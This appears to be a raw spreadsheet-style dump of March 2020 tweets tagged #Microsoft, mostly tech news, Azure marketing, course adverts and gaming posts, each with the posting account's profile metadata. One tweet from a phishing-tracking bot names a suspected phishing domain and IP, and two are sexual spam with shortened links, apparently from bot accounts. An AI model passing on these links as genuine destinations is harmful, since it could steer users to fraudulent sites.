    <t>{'id': 29554682, 'id_str': '29554682', 'name': 'Alexis Menard', 'screen_name': 'darktears', 'location': 'Hillsboro, OR', 'description': 'Dual-screen devices is currently my focus. Worked with immersive web, works on Blink/Chromium web engine at @Intel. Opinions and tweets are my own. #IamIntel', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 439, 'friends_count': 210, 'listed_count': 12, 'created_at': 'Tue Apr 07 21:46:49 +0000 2009', 'favourites_count': 88, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1169,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'http://pbs.twimg.com/profile_images/700059679871774720/KyF8AGmh_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/700059679871774720/KyF8AGmh_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/29554682/1501524832',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</si>
  <si>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05:06:57 +0000 2020</t>
  </si>
  <si>
    <t>You look for "Linux" news and get #microsoft #proprietarysoftware instead https://t.co/7MXsy8mB1h see https://t.co/PqAMcGFkAi</t>
  </si>
  <si>
    <t>Tue Mar 03 05:06:24 +0000 2020</t>
  </si>
  <si>
    <t>The companies decisions are the latest in a series of cancelations to major annual events held by the tech industry each year.
#Facebook, #Google, #Microsoft, #Adobe pull out of more #conferences as #coronavirus #spreads 
https://t.co/XbyvTEoslv https://t.co/lNmQdROF9Q</t>
  </si>
  <si>
    <t>{'id': 1127957201920954369, 'id_str': '1127957201920954369', 'name': 'Defoes Investment', 'screen_name': 'DefoesInvest', 'location': 'Zug, Switzerland', 'description': 'ðŸ“London,Switzerland &amp; New York ðŸ“ž 001 (917)475-0832 [NY] | 0203 918 1785 [LN] ðŸ“¨ info@defoes.com ðŸ’° #Raisecapital ðŸ“ˆ #investment ðŸ“¡ #tech ðŸ”‹#energy ðŸ“Š#mining', 'url': 'https://t.co/2yTgRDUODH', 'entities': {'url': {'urls': [{'url': 'https://t.co/2yTgRDUODH', 'expanded_url': 'https://defoes.com', 'display_url': 'defoes.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 417, 'friends_count': 18, 'listed_count': 0, 'created_at': 'Mon May 13 15:22:08 +0000 2019', 'favourites_count': 246, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 518, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1176709971859443712/7qULA5ZQ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1176709971859443712/7qULA5ZQ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1127957201920954369/1561038037',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</si>
  <si>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05:05:48 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Edge can now block adware and other 'potentially unwanted apps' https://t.co/9QHESOd003</t>
  </si>
  <si>
    <t>Tue Mar 03 05:05:38 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft already (mis)uses #GitHub to pretend tall projects not controlled by Microsoft neither exist nor count. That is a major #propaganda tool... https://t.co/o67UkUC3yM #deletegithub</t>
  </si>
  <si>
    <t>Tue Mar 03 05:05:32 +0000 2020</t>
  </si>
  <si>
    <t>#Facebook, #Google, #Microsoft, #Adobe pull out of more #conferences as #coronavirus #spreads | Defoes  https://t.co/vOY7k6MxLU</t>
  </si>
  <si>
    <t>Tue Mar 03 05:05:17 +0000 2020</t>
  </si>
  <si>
    <t>ExpressRoute Global Reach: Building your own cloud-based global backbone https://t.co/fmiVkAdJQM #cloud #microsoft #azure</t>
  </si>
  <si>
    <t>Tue Mar 03 05:04:04 +0000 2020</t>
  </si>
  <si>
    <t>Visual Search, Your key questions answered - https://t.co/L1nQMFIBhA
#Microsoft #Computer #VetTech #Tech #Fafsa #CyberSecurity https://t.co/YesUXiQild</t>
  </si>
  <si>
    <t>{'id': 912918862345142273, 'id_str': '912918862345142273', 'name': 'Ethan Ratchford', 'screen_name': 'ITTrainingCA', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 157, 'friends_count': 158, 'listed_count': 0, 'created_at': 'Wed Sep 27 05:56:32 +0000 2017', 'favourites_count': 8838, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 757, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/912920234935439360/KQgjeWh6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/912920234935439360/KQgjeWh6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/912918862345142273/1506492233',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</si>
  <si>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05:03:27 +0000 2020</t>
  </si>
  <si>
    <t>How can you help students tackle the complex challenges of tomorrow? See how educators are transforming learning through student-centered approaches. #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/GIMQOsOwsC</t>
  </si>
  <si>
    <t>Tue Mar 03 05:02:23 +0000 2020</t>
  </si>
  <si>
    <t>49% of executives believe that using data analytics can help lower costs. So, why haven't you taken the steps to modernize with @SQLServer? Let us help. #Microsoft https://t.co/4QZTT9BWEm</t>
  </si>
  <si>
    <t>{'id': 3747216568, 'id_str': '3747216568', 'name': 'cjeans design house', 'screen_name': 'cjeansdesign', 'location': 'Nairobi, Kenya', 'description': '', 'url': 'https://t.co/OtY3C7uxnp', 'entities': {'url': {'urls': [{'url': 'https://t.co/OtY3C7uxnp', 'expanded_url': 'http://www.cjeansdesignhouse.com', 'display_url': 'cjeansdesignhouse.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 127, 'friends_count': 562, 'listed_count': 1, 'created_at': 'Wed Sep 23 07:33:34 +0000 2015', 'favourites_count': 7, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 137,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'http://pbs.twimg.com/profile_images/1005661624487895040/SZWzwKBf_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1005661624487895040/SZWzwKBf_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3747216568/1562149036', 'profile_link_color': 'A8228E',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</si>
  <si>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05:00:05 +0000 2020</t>
  </si>
  <si>
    <t>Warm welcome to the #Azure Universal Print! A long waited functionality to organize #printers with a native #cloud solution!
#microsoft #microsoftazure #cloudadoption #cloudprint #universalprint #office365 #MSFTAdvocate https://t.co/YbZ4woZsQm</t>
  </si>
  <si>
    <t>{'id': 278508040, 'id_str': '278508040', 'name': 'Francesco Sodano', 'screen_name': 'aresmarte1', 'location': 'Geneva, Switzerland', 'description': '#MVP and #MCM #office365, Top25 #Office365 Influencer, #Azure Solution Specialist at #Microsoft, Photographer, #Drone Pilot', 'url': 'https://t.co/813ENiinT0', 'entities': {'url': {'urls': [{'url': 'https://t.co/813ENiinT0', 'expanded_url': 'https://beyondthecloud.blog', 'display_url': 'beyondthecloud.blog', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 688, 'friends_count': 312, 'listed_count': 127, 'created_at': 'Thu Apr 07 12:20:01 +0000 2011', 'favourites_count': 613, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 10880,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'http://pbs.twimg.com/profile_images/721084640300265472/m_Px6UYe_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/721084640300265472/m_Px6UYe_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/278508040/1478376001',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</si>
  <si>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05:00:03 +0000 2020</t>
  </si>
  <si>
    <t>#Avanade innovates with #PowerBI &amp;amp; #Azure to improve employee #retention - #Microsoft #CosmosDB #DevOps Cem U. https://t.co/BqVDLunKb7 #MSFTAdvocate</t>
  </si>
  <si>
    <t>Tue Mar 03 04:57:21 +0000 2020</t>
  </si>
  <si>
    <t>Top Stories from the Microsoft DevOps Community  2020.02.28 https://t.co/OzICBUbgp3 #Microsoft #Azure</t>
  </si>
  <si>
    <t>Tue Mar 03 04:57:03 +0000 2020</t>
  </si>
  <si>
    <t>I have a successful @DayZ page on Facebook! Now Ive just created a @MFSimulator2020 page too! Please go search and join! 
 Name: Microsoft Flight Simulator
#MicrosoftFlightSimulator #gaming #SupportSmallStreamers #Xbox #Microsoft #Facebook #farming @Xbox @matthewn2706 https://t.co/Ilrmt8nDaR</t>
  </si>
  <si>
    <t>{'id': 1082860551951339520, 'id_str': '1082860551951339520', 'name': 'DIAB3TIC PANDA3', 'screen_name': 'Diab3ticP', 'location': 'England, United Kingdom', 'description': 'https://t.co/k8kPI2qOiM', 'url': 'https://t.co/k8kPI2qOiM', 'entities': {'url': {'urls': [{'url': 'https://t.co/k8kPI2qOiM', 'expanded_url': 'https://www.facebook.com/groups/718945208210159/', 'display_url': 'facebook.com/groups/7189452â€¦', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/k8kPI2qOiM', 'expanded_url': 'https://www.facebook.com/groups/718945208210159/', 'display_url': 'facebook.com/groups/7189452â€¦', 'indices': [0, 23]}]}}, 'protected': False, 'followers_count': 58, 'friends_count': 82, 'listed_count': 1, 'created_at': 'Wed Jan 09 04:44:08 +0000 2019', 'favourites_count': 173, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 248, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1086564085477588992/KDPRXRW7_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1086564085477588992/KDPRXRW7_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1082860551951339520/1548563784',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</si>
  <si>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04:47:25 +0000 2020</t>
  </si>
  <si>
    <t>Check out Original Microsoft Xbox 500GB in Box TESTED WORKS 1 Controller #Microsoft #OriginalXbox https://t.co/zv4tWStwFY via @eBay</t>
  </si>
  <si>
    <t>{'id': 1013545957454012417, 'id_str': '1013545957454012417', 'name': 'RBWholesalers', 'screen_name': 'RbWholesalers', 'location': 'California, USA', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 381, 'friends_count': 1773, 'listed_count': 1, 'created_at': 'Sun Jul 01 22:12:41 +0000 2018', 'favourites_count': 59, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 8961,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</si>
  <si>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Tue Mar 03 04:44:27 +0000 2020</t>
  </si>
  <si>
    <t>We dont get to hear #Apple or #Google #Microsoft #IBM from India, but we do have Indians leading some of them. Is it because our ecosystem doesnt encourage ideas or we dont have deep pockets to experiment and develop products and services What do you say ? #innovation</t>
  </si>
  <si>
    <t>{'id': 42683831, 'id_str': '42683831', 'name': 'Prashant JoglekarðŸ’¡ðŸ‡®ðŸ‡³', 'screen_name': 'ideabound', 'location': 'Mumbai,Maharashtra,India', 'description': '#PJgiri #Transformation #Consulting #DesignThinking #systematic #Innovation #EricksonCertified #Coach #Storyteller #Knowledge pollinator #TRIZ convert', 'url': 'https://t.co/OrJRpBDWPb', 'entities': {'url': {'urls': [{'url': 'https://t.co/OrJRpBDWPb', 'expanded_url': 'https://in.linkedin.com/in/prashant-joglekar-791429b', 'display_url': 'in.linkedin.com/in/prashant-joâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3600, 'friends_count': 470, 'listed_count': 470, 'created_at': 'Tue May 26 18:23:32 +0000 2009', 'favourites_count': 4043, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 29072,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'http://pbs.twimg.com/profile_images/1210416951652052992/MTvN9bP1_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1210416951652052992/MTvN9bP1_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/42683831/1580840043',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</si>
  <si>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04:43:57 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Excel - Complete Guide for Certification - 95% OFF - Regular ($399.99) - Now Only $19.99
[Register] - https://t.co/LIi9MVFt9v
#Microsoft #BrianCulp #YouAccel #Courses #Learn #Learning #Knowledge 
The Excel Masterclass. Get started with a career in data analysis</t>
  </si>
  <si>
    <t>{'id': 3429177610, 'id_str': '3429177610', 'name': 'YouAccel', 'screen_name': 'YouAccel', 'location': '', 'description': 'Leading Provider of E-learning and Job Search Solutions. Stop Waiting. Start Searching.', 'url': 'https://t.co/EfwYtt9LAC', 'entities': {'url': {'urls': [{'url': 'https://t.co/EfwYtt9LAC', 'expanded_url': 'https://youaccel.com', 'display_url': 'youaccel.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 12100, 'friends_count': 1940, 'listed_count': 8, 'created_at': 'Mon Aug 17 23:55:59 +0000 2015', 'favourites_count': 10176, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 8983,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'http://pbs.twimg.com/profile_images/1148069344397660160/-qygTNRV_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1148069344397660160/-qygTNRV_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3429177610/1439857281',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</si>
  <si>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04:41:42 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> https://exampleformicrosoft.ddns.net
Suspected #phishing #opendir
Possible zip!
AS16125 [46.166.162.159]
Let's Encrypt Authority X3
Keywords: #form #microsoft
https://t.co/bnEy7oG4FR https://t.co/AunTP3NTQ4</t>
  </si>
  <si>
    <t>{'id': 1224370481375186944, 'id_str': '1224370481375186944', 'name': 'PhishingReel ðŸŽ£', 'screen_name': 'phishingreel', 'location': '', 'description': 'An in-development bot which analyses emerging targeted phishing threats as they are spun up. Tweet rate will vary.  \nMade by @sysgoblin', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 53, 'friends_count': 36, 'listed_count': 0, 'created_at': 'Mon Feb 03 16:34:25 +0000 2020', 'favourites_count': 5, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1941, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1226568624934137856/9sDqtfkE_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1226568624934137856/9sDqtfkE_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1224370481375186944/1581101225',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</si>
  <si>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04:38:14 +0000 2020</t>
  </si>
  <si>
    <t>February https://t.co/aJnOFXAKo0 Model Builder Updates https://t.co/WRXMSiVae8 #Microsoft</t>
  </si>
  <si>
    <t>.NET Core 3.0 will reach End of Life on March 3, 2020 https://t.co/hOCApmIaUK #Microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 04:38:13 +0000 2020</t>
  </si>
  <si>
    <t>.NET Framework February 2020 Preview of Quality Rollup for Windows 10 1909, Windows 10 1903, Windows Server, version 1909 and Windows Server, version 1903 https://t.co/J6cy2fng9A #Microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 04:31:18 +0000 2020</t>
  </si>
  <si>
    <t>With #Microsoft #Azure, SitePro harnesses the power of data to drive digital transformation for its oil and gas company customers. https://t.co/ZUgzcP9uAC</t>
  </si>
  <si>
    <t>Tue Mar 03 04:31:10 +0000 2020</t>
  </si>
  <si>
    <t>From enhanced services to optimized defense and intelligence operations, read how #Microsoft for Government is empowering public institutions worldwide. https://t.co/RO4FvcgMHT</t>
  </si>
  <si>
    <t>Tue Mar 03 04:30:49 +0000 2020</t>
  </si>
  <si>
    <t>Useful #flowchart  to decide between #LiftandShift or #ApplicationModernization using #Containers, #AKS, #Serverless #PaaS, #MicroServices on #MicrosoftAzure 
Microsoft #Azure #CloudAdoptionFramework #CAF #microsoft #cloud
https://t.co/vElqu9zl24 https://t.co/PfXaV3whXh</t>
  </si>
  <si>
    <t>{'id': 107131887, 'id_str': '107131887', 'name': 'Dilip Nathani', 'screen_name': 'dilip_nathani', 'location': 'Mumbai, India', 'description': 'Technology Lead (SAP on Azure)-India', 'url': 'https://t.co/IijuYyvzQo', 'entities': {'url': {'urls': [{'url': 'https://t.co/IijuYyvzQo', 'expanded_url': 'https://azure.com/sap', 'display_url': 'azure.com/sap', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 20, 'friends_count': 206, 'listed_count': 2, 'created_at': 'Thu Jan 21 16:55:54 +0000 2010', 'favourites_count': 30, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 221,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'http://pbs.twimg.com/profile_images/1028341719023013888/G-PajVcP_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1028341719023013888/G-PajVcP_normal.jpg',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</si>
  <si>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04:27:05 +0000 2020</t>
  </si>
  <si>
    <t>Do you want to fuck me? Like it #Davie   #microsoft #thankyou https://t.co/r0Z30xILlW</t>
  </si>
  <si>
    <t>{'id': 1234590038366748672, 'id_str': '1234590038366748672', 'name': 'Jessica Morales', 'screen_name': 'lasocumbmo', 'location': 'Aurora, USA', 'description': 'We are never so defensless against suffering as when we love', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4, 'friends_count': 45, 'listed_count': 0, 'created_at': 'Mon Mar 02 21:23:03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'http://pbs.twimg.com/profile_images/1234596637860913153/tHgERiwX_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234596637860913153/tHgERiwX_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234590038366748672/1583185790',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</si>
  <si>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04:18:29 +0000 2020</t>
  </si>
  <si>
    <t>A year back i got my outlook account blocked because someone else tried to sign in my account. Till now, Microsoft hasn't solved the issue. I have my bank account statements sent to that mail id. Inspite of expressing my urgency, they didn't bother. #Microsoft #Outlook</t>
  </si>
  <si>
    <t>{'id': 800448379, 'id_str': '800448379', 'name': 'Sriram Raghunathan', 'screen_name': 'sriramkuwait', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1, 'friends_count': 33, 'listed_count': 0, 'created_at': 'Mon Sep 03 13:47:00 +0000 2012', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 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</si>
  <si>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Tue Mar 03 04:15:20 +0000 2020</t>
  </si>
  <si>
    <t>I'm in an #APC!
#New #processor in the #build, and I am #maxedOut on #Ultra.
#Ready for #nextGen?
#PS5 #XBoxXSeries #Sony #Microsoft
--
#Pyongmatou #jesuisunevictime #KamiTidakTakutVirusCorona #ARMYSelcaDay #COVID19 #hardball #NarendraModi #Nokuthula #WarrenEndorseBernie # https://t.co/j5w2mdOQIh</t>
  </si>
  <si>
    <t>{'id': 616162782, 'id_str': '616162782', 'name': 'D474â„¢', 'screen_name': 'D474designs', 'location': 'Mexico', 'description': 'I relay that reality,\nspit automatically.\nI create what is adjective:\nclassically.\n#Media, #Gaming, and the #News.\nMC #D474. #D474designs.\n#Design &amp; #Promotion.', 'url': 'https://t.co/cRY3L021pf', 'entities': {'url': {'urls': [{'url': 'https://t.co/cRY3L021pf', 'expanded_url': 'http://www.D474designs.webs.com', 'display_url': 'D474designs.webs.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 5474, 'friends_count': 4178, 'listed_count': 84, 'created_at': 'Sat Jun 23 12:50:03 +0000 2012', 'favourites_count': 11433, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 14528,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'http://pbs.twimg.com/profile_images/1187252927565447173/ub0OmrQj_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1187252927565447173/ub0OmrQj_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/616162782/1551789062', 'profile_link_color': '005B94',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</si>
  <si>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04:15:04 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft sets #PowerAutomates #RPA pricing, general availability for April 2. https://t.co/qu5u6YgLQ1</t>
  </si>
  <si>
    <t>{'id': 50302951, 'id_str': '50302951', 'name': 'Paul DL', 'screen_name': 'Paul_Dan', 'location': '', 'description': 'IT geek, cybersecurity practitioner, husband &amp; father. I love Jesus!', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 293, 'friends_count': 134, 'listed_count': 545, 'created_at': 'Wed Jun 24 13:23:20 +0000 2009', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 14720,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'http://pbs.twimg.com/profile_images/489024588114702338/jfnoLOkJ_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/489024588114702338/jfnoLOkJ_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/50302951/1409783142',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</si>
  <si>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Tue Mar 03 04:13:36 +0000 2020</t>
  </si>
  <si>
    <t>Mac OS is good with updates and so is windows. If you update your machine within a week of an update, your fine. And update stability has never been an issue. Thanks @Microsoft for Windows and the great work your doing with Windows 10! #Microsoft #Windows10 (2/2)</t>
  </si>
  <si>
    <t>{'id': 1099750817651781632, 'id_str': '1099750817651781632', 'name': 'Peter Strouhal ðŸ‡¨ðŸ‡¦ ðŸ‡¨ðŸ‡¿', 'screen_name': 'peter_strouhal', 'location': 'Calgary, Alberta', 'description': 'Nature, green tech, biathlon, tesla and politics (Canada Conservative supporter), student, global warming, cars, Microsoft, Mountain Biking..', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 12, 'friends_count': 51, 'listed_count': 0, 'created_at': 'Sun Feb 24 19:20:02 +0000 2019', 'favourites_count': 563, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 917, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1099759454281621504/lH_tQuxn_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1099759454281621504/lH_tQuxn_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1099750817651781632/1571798347',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</si>
  <si>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04:09:00 +0000 2020</t>
  </si>
  <si>
    <t>Go beyond the basics and supercharge your Excel capabilities. #excel #microsoft #excel2016 #MSExcel2016 #LearnSAP #SAP #SAPtraining #jobtips #workathome #onlinejobs #career #training #system
Excel 2016 Advanced https://t.co/cm17Zdtn68</t>
  </si>
  <si>
    <t>{'id': 370638659, 'id_str': '370638659', 'name': 'Michael Management', 'screen_name': 'mmc_erp', 'location': 'New York, NY', 'description': 'We create awesome #SAP eLearning courses. Over 20,000 SAP Professionals received their certification from us. Join now - free trial: https://t.co/GdKFjJEr4U', 'url': 'https://t.co/a0rMEcb2Gl', 'entities': {'url': {'urls': [{'url': 'https://t.co/a0rMEcb2Gl', 'expanded_url': 'http://www.michaelmanagement.com', 'display_url': 'michaelmanagement.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/GdKFjJEr4U', 'expanded_url': 'http://bit.ly/1UvJkLh', 'display_url': 'bit.ly/1UvJkLh', 'indices': [133, 156]}]}}, 'protected': False, 'followers_count': 4532, 'friends_count': 1292, 'listed_count': 128, 'created_at': 'Fri Sep 09 11:20:42 +0000 2011', 'favourites_count': 1612, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 9597,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'http://pbs.twimg.com/profile_images/805697211304579072/jonFXUl9_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/805697211304579072/jonFXUl9_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/370638659/1480928110', 'profile_link_color': 'FFA500',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</si>
  <si>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Tue Mar 03 04:06:08 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve">I am grateful that we have a room for #mvpsummit2020  online-only event during the more worrying bad break of COVID-19, Thank you #Microsoft to make it up for us </t>
  </si>
  <si>
    <t>Tue Mar 03 04:05:20 +0000 2020</t>
  </si>
  <si>
    <t>Two ways to open up new lines of communication for your business: 1. Deploy #Microsoft #Teams across your organization as the hub for teamwork in #Office365. 2. Subscribe now to this channel. Enable your digital workspace by doing both. https://t.co/RZAjjXPHrR</t>
  </si>
  <si>
    <t>{'id': 2724198175, 'id_str': '2724198175', 'name': 'Technology Tree', 'screen_name': 'TechTreeAus', 'location': 'Perth, Western Australia', 'description': 'Perth based IT company using the latest technology to do just about anything to get your network up and running, and keep it running.', 'url': 'https://t.co/39vO5rGRIJ', 'entities': {'url': {'urls': [{'url': 'https://t.co/39vO5rGRIJ', 'expanded_url': 'http://www.technologytree.com.au', 'display_url': 'technologytree.com.au', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 54, 'friends_count': 78, 'listed_count': 6, 'created_at': 'Mon Aug 11 15:40:42 +0000 2014', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 508,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'http://pbs.twimg.com/profile_images/1044837599137992704/xehb_NxD_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1044837599137992704/xehb_NxD_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2724198175/1537944983',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</si>
  <si>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04:02:12 +0000 2020</t>
  </si>
  <si>
    <t>Top Stories from the Microsoft DevOps Community  2020.02.28
https://t.co/I1mDiefiif
#Microsoft #Azure #AzureDevOps #DevOps</t>
  </si>
  <si>
    <t>Azure DevOps Services to require TLS 1.2
https://t.co/o7BNJdolQ6
#Microsoft #Azure #AzureDevOps #DevOps</t>
  </si>
  <si>
    <t>Tue Mar 03 04:00:15 +0000 2020</t>
  </si>
  <si>
    <t>I'm live on @WatchMixer playing some @PlayApex lets go!! @QueenKline15 @TeamDukeStars @rails_team @KryptikReality @RPhantomalucard @momma_train @trainwrek94 @RenoHill #mixerstreamer #mixerstreamersconnect #ApexLegends #Microsoft #XboxOne https://t.co/4k7HF5Jci3</t>
  </si>
  <si>
    <t>{'id': 1566326516, 'id_str': '1566326516', 'name': 'kingjbyrd', 'screen_name': 'kingjbyrd', 'location': 'Olympia, WA', 'description': 'Awesome @watchmixer streamer, member of @teamdukestars, gamer, dad, and husband!!', 'url': 'https://t.co/7yEbMxpRRI', 'entities': {'url': {'urls': [{'url': 'https://t.co/7yEbMxpRRI', 'expanded_url': 'http://mixer.com/kingjbyrd', 'display_url': 'mixer.com/kingjbyrd', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 543, 'friends_count': 827, 'listed_count': 6, 'created_at': 'Wed Jul 03 17:46:02 +0000 2013', 'favourites_count': 4104, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3072,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'http://pbs.twimg.com/profile_images/1115343743308128256/MfV78ib9_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1115343743308128256/MfV78ib9_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1566326516/1554008755',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</si>
  <si>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04:00:01 +0000 2020</t>
  </si>
  <si>
    <t>The Catholic Church proposes AI regulations that protect people 
https://t.co/lHoMyGAj6Q 
#IBM #microsoft #ethics #technology #AI #regulations #data #issquared #cybersecurity #internet</t>
  </si>
  <si>
    <t>Tue Mar 03 03:53:22 +0000 2020</t>
  </si>
  <si>
    <t>Sleep, my friend, sweetly, I want in your crib, in that bed where you lie, I want you, baby #Nevada   #actor #microsoft https://t.co/fMWjOQuiDk</t>
  </si>
  <si>
    <t>{'id': 1234605487083196423, 'id_str': '1234605487083196423', 'name': 'Lorna Rolfs', 'screen_name': 'tomctisunist', 'location': 'Sioux Falls, USA', 'description': 'Heâ€™s more myself than I am. Whatever our souls are made of, his and mine are the same', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 3, 'friends_count': 34, 'listed_count': 0, 'created_at': 'Mon Mar 02 22:24:26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'http://pbs.twimg.com/profile_images/1234613407275520000/k7_klmYu_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234613407275520000/k7_klmYu_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234605487083196423/1583207277',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</si>
  <si>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03:52:56 +0000 2020</t>
  </si>
  <si>
    <t>Realize cloud benefits everywhere by extending Azure services to any infrastructureincluding other clouds. #azure #microsoft #innovation https://t.co/ebG3roimaz #MSFTAdvocate</t>
  </si>
  <si>
